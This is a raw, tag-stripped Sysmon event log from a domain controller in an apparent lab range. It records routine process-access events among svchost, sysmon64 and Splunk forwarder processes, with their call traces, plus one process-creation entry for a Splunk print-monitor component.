12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.121{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.121{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C7-6064-AA00-00000000AE01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C7-6064-AA00-00000000AE01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C7-6064-AA00-00000000AE01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.982{266CAFBE-64C7-6064-AA00-00000000AE01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000004848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
